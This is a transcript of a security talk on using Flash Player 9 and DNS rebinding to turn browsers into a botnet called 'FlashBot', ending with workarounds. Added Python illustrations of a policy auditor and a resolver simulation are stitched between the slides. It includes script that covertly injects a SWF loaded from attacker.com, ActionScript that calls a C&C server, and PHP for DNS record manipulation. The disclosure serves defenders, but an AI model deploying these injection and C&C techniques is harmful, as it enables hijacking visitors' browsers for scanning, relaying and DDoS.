Slideshow Transcript
- Slide 1: Zombilizing The Web Browsers Via Flash Player 9. Thai N. Duong <thaidn AT gmail DOT com>, http://vnhacker.blogspot.com
- Slide 2: Overview
  - Flash Player 9 and its potential weaknesses: the Socket class
  - Breaking the same-origin policy using crossdomain.xml and DNS spoofing
  - Exploiting the weaknesses: introducing FlashBot
  - Demo
  - Workarounds
- Slides 3-5: Flash Player 9 Socket class. Quote from the Flash 9 documentation: "The Socket class enables ActionScript code to make socket connections and to read and write raw binary data. The Socket class is useful for working with servers that use binary protocols." Let's port nmap to ActionScript! Err, wait, how about the same-origin policy?
- Slide 6: Same-Origin Policy
  - originally released with Netscape Navigator 2.0 and incorporated into every major browser since
  - prevents a document or script loaded from one site of origin from manipulating properties of, or communicating with, a document loaded from another site of origin
  - origin = domain name + port + protocol
- Slide 7: Same-Origin Policy
- Slide 8: Flash Player 9 Same-Origin Policy
- Slide 9: Breaking the SOP: crossdomain.xml. A SWF file from a.com may read from the server at b.com (using the Socket class, for example) if b.com has a cross-domain policy file that permits access from a.com (or from all domains):
    <?xml version="1.0"?>
    <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
    <cross-domain-policy>
        <allow-access-from domain="*" to-ports="*" />
    </cross-domain-policy>
  Examples of sites publishing such a file: Yahoo! (http://api.search.yahoo.com/crossdomain.xml), YouTube (http://www.youtube.com/crossdomain.xml), Amazon.com (http://www.amazon.com/crossdomain.xml)
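As an added illustration (not code from the talk), a small Python audit of a crossdomain.xml document that flags the wildcard settings slide 9 warns about; the two policies are constructed samples, the first being the one quoted on the slide.

```python
import xml.etree.ElementTree as ET

# Constructed sample: the wildcard policy quoted on slide 9.
PERMISSIVE_POLICY = """<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
  <allow-access-from domain="*" to-ports="*" />
</cross-domain-policy>"""

# Constructed sample: access limited to one named partner host, one port, HTTPS only.
RESTRICTED_POLICY = """<?xml version="1.0"?>
<cross-domain-policy>
  <allow-access-from domain="partner.example.net" to-ports="443" secure="true" />
</cross-domain-policy>"""

def audit_crossdomain_policy(xml_text):
    """Return (severity, message) findings for each over-broad allow-access-from rule."""
    root = ET.fromstring(xml_text)
    findings = []
    for rule in root.iter("allow-access-from"):
        domain = rule.get("domain", "")
        ports = rule.get("to-ports", "")
        secure = rule.get("secure", "true").lower()
        if domain == "*":
            findings.append(("HIGH", 'any origin may read from this host (domain="*")'))
        elif domain.startswith("*."):
            findings.append(("MEDIUM", f"every subdomain of {domain[2:]} is trusted"))
        if ports == "*":
            findings.append(("HIGH", 'Socket connections permitted to every port (to-ports="*")'))
        if secure == "false":
            findings.append(("MEDIUM", f'{domain}: HTTP-served SWFs may read HTTPS content (secure="false")'))
    return findings

def severities(xml_text):
    """Convenience view: just the severity labels, in document order."""
    return [sev for sev, _ in audit_crossdomain_policy(xml_text)]
```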
- Slides 10-12: DNS Pinning Explained. Same-origin policy: origin = domain name + port + protocol. DNS is not static, and host names could potentially resolve to different addresses over the course of a browsing session (dynamic DNS, anybody?). Browsers use DNS pinning to prevent attackers from manipulating DNS timeouts to their advantage. DNS pinning means that once an address is returned for a host name it is used for the duration of the browsing session, regardless of the DNS timeout associated with the domain. Fact: Flash Player does not pin DNS at all.
- Slides 13-17: Breaking the SOP: DNS Spoofing
  1) The user loads a SWF file from www.attacker.com and performs a DNS lookup for that hostname, receiving 222.222.222.222 with a TTL of one second.
  2) ActionScript in the SWF file tells the Flash Player to connect back to www.attacker.com after two seconds, shortly after the TTL expired.
  3) Since the DNS record is no longer valid, the user's Flash Player connects to the DNS server to ask where www.attacker.com is now located.
  4) The DNS server, controlled by the attackers, responds with 111.111.111.111, which points to www.example.com.
  5) The SWF file located on www.attacker.com now has full access to www.example.com.
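To make the pinning contrast of slides 10-12 and the five-step sequence above concrete, here is an added Python model (not from the talk) that replays the timeline against a toy resolver driven by a fake clock; the answer sequence, the one-second TTL and the 127.0.0.1 target come from the slides, while the rebind check is an assumed detection heuristic.

```python
import ipaddress

# Constructed answer sequence for www.attacker.com: a public address with a 1-second TTL
# first, then the attacker-controlled DNS server re-points the name at the demo target.
SCRIPTED_ANSWERS = [("222.222.222.222", 1), ("127.0.0.1", 1)]

class Resolver:
    """Toy TTL-honouring resolver driven by an explicit clock; no real network I/O."""
    def __init__(self, answers):
        self._answers = list(answers)
        self._cache = {}  # name -> (ip, expiry time)

    def _upstream(self):
        # The authoritative server changes its answer over time; the last answer then sticks.
        return self._answers.pop(0) if len(self._answers) > 1 else self._answers[0]

    def resolve(self, name, now):
        ip, expires = self._cache.get(name, (None, -1))
        if ip is None or now >= expires:
            ip, ttl = self._upstream()
            self._cache[name] = (ip, now + ttl)
        return ip

class Client:
    """pin_dns=True models the browser (slide 11): the first address is reused all session.
    pin_dns=False models Flash Player 9 (slide 12): each connection re-resolves after the TTL."""
    def __init__(self, resolver, pin_dns):
        self.resolver, self.pin_dns, self.pins = resolver, pin_dns, {}

    def connect_ip(self, name, now):
        if self.pin_dns:
            if name not in self.pins:
                self.pins[name] = self.resolver.resolve(name, now)
            return self.pins[name]
        return self.resolver.resolve(name, now)

def is_rebind(first_ip, later_ip):
    """Assumed detection heuristic: the same name moved from a public address into
    loopback/private/link-local space, which is what the port-scanning demo relies on."""
    a, b = ipaddress.ip_address(first_ip), ipaddress.ip_address(later_ip)
    return a != b and (b.is_loopback or b.is_private or b.is_link_local)

def run_session(pin_dns):
    """Replay the slide 13-17 timeline: load at t=0, reconnect at t=2 after the 1 s TTL expired."""
    client = Client(Resolver(SCRIPTED_ANSWERS), pin_dns)
    first = client.connect_ip("www.attacker.com", now=0)
    later = client.connect_ip("www.attacker.com", now=2)
    return first, later, is_rebind(first, later)
```

The address check only fires when a name moves into loopback or private space, so a rebind to a public target such as slide 16's 111.111.111.111 passes it unnoticed; it complements rather than replaces the plugin and firewall workarounds on slide 26.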
- Slide 18: FlashBot 101
  - a 130KB SWF file written in ActionScript 3.0 that works on all web browsers supporting Flash Player 9
  - once loaded in victim web browsers, FlashBot can leverage victim computers to execute commands received from a C&C server
  - commands that FlashBot understands: port scanning, socket relaying (i.e., to send shellcode), launching web DDoS attacks
- Slide 19: How FlashBot works. FlashBot is secretly inserted into www.example.com via JavaScript or an iframe:
    function source() {
        return "http://" + Math.random().toString().substr(2) + "." + "attacker.com/flashbot.swf";
    }
    document.write('<object width="1" height="1">');
    document.write('<embed src="' + source() + '" type="application/x-shockwave-flash" width="1" height="1">');
    document.write('</embed></object>');
- Slide 20: How FlashBot works. The victim visits www.example.com, which loads FlashBot from http://<random-subdomain>.attacker.com/flashbot.swf. ActionScript in FlashBot connects back to the C&C server:
    private function getCommand(subdomain:String, domain:String):void {
        var cnc:String = "http://cnc" + "." + domain;
        var connection:NetConnection = new NetConnection();
        connection.connect(cnc + "/flashservices/gateway.php");
        connection.call("FlashBot.getCommand", responder, subdomain, domain);
    }
- Slide 21: How FlashBot works. The C&C server sends FlashBot a command associated with a target IP address, and automatically updates the DNS server (powered by PowerDNS) to map the victim's subdomain to the target IP address:
    $query = "SELECT 1 FROM records WHERE name = '$record_name'";
    $result = mysql_query($query);
    if ( mysql_num_rows($result) ) {
        $query = "UPDATE records SET content='$ip' WHERE name='$record_name'";
    } else {
        $query = "INSERT INTO records VALUES (NULL, 2, '$record_name', 'A', '$ip', '6', NULL, NULL)";
    }
- Slide 22: How FlashBot works. ActionScript in FlashBot waits for the DNS information to expire:
    timer1 = new Timer( 10 * 1000, 1 );
    timer1.addEventListener( TimerEvent.TIMER, exeCommand );
    timer1.start();
  FlashBot then executes the command, (optionally) sends the result back to the C&C server, and starts the whole process over.
- Slide 23: Show Time!
  - set your DNS server to 221.133.4.24
  - start Wireshark to see what you send out!
- Slide 24: Demo 1: port scanning
  - works on Firefox
  - scans 127.0.0.1
  - scans all other hosts in the same subnet as the victim
  - http://www.example.com/scanport.html
- Slide 25: Demo 2: socket relaying
  - works on all browsers supporting Flash Player 9
  - relays socket connections to any IP address on the intranet and the Internet
  - can be used to send shellcode or spam mail, or to launch DDoS attacks
  - http://www.example.com/relay.html
- Slide 26: Workarounds
  - disable Flash Player (and all other plugins) in your web browser
  - still want to watch youtube.com? use Firefox + NoScript + FlashBlock
  - restrict browser access to only ports 80 and 443 using a personal firewall
- Slide 27: Thanks. DAB Security Team; VNSecurity Team, esp. rd and aquynh; http://christ1an.blogspot.com; http://www.jumperz.net; theresacow: I owe you a hug ;).
- Slide 28: Zombilizing The Web Browsers Via Flash Player 9. Thank you! Questions/Comments? Thai N. Duong